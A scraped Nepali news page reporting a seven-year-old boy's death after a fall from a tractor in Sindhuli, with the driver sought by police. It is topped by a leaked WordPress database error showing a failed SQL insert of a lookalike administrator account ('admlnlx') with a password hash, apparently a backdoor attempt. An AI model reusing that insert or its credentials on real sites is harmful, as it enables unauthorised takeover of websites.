WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNdcKFwLZ8e/u01jaWNPO9NAc.NUk31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:52:31', '', 'admlnlx', 'admlnlx')
सिन्धुली, मंसिर २६ –
पिपलमाढी गाविसमा ट्र्याक्टरबाट खस्दा पिपलमाढी– १ घर भएका सातवर्षीय मनोज गोलेको आज घटनास्थलमै मृत्यु भएको छ ।
बालक ट्याक्टरबाट अचानक झर्दा उक्त ट्र्याक्टरको टेलरको चक्काले थिचिँदा मुत्यु भएको प्रहरीले बताएको छ ।
ढुङ्गा लिन मरिण खोलातर्फ जाँदै गरेको ना ५ त ३६३८ नं ट्याक्टरबाट खस्दा बालकको ज्यान गएको जिल्ला प्रहरी कार्यालय सिन्धुलीले जनाएको छ ।
पिपलमाढी– १ श्रीपुर नरसरी सिसौघारीस्थित ती बालक झमझमेबाट चढेका थिए । चालक फरार रहेकाले खोजी जारी रहेको जिल्ला प्रहरी कार्यालय सिन्धुलीले जनाएको छ । – रासस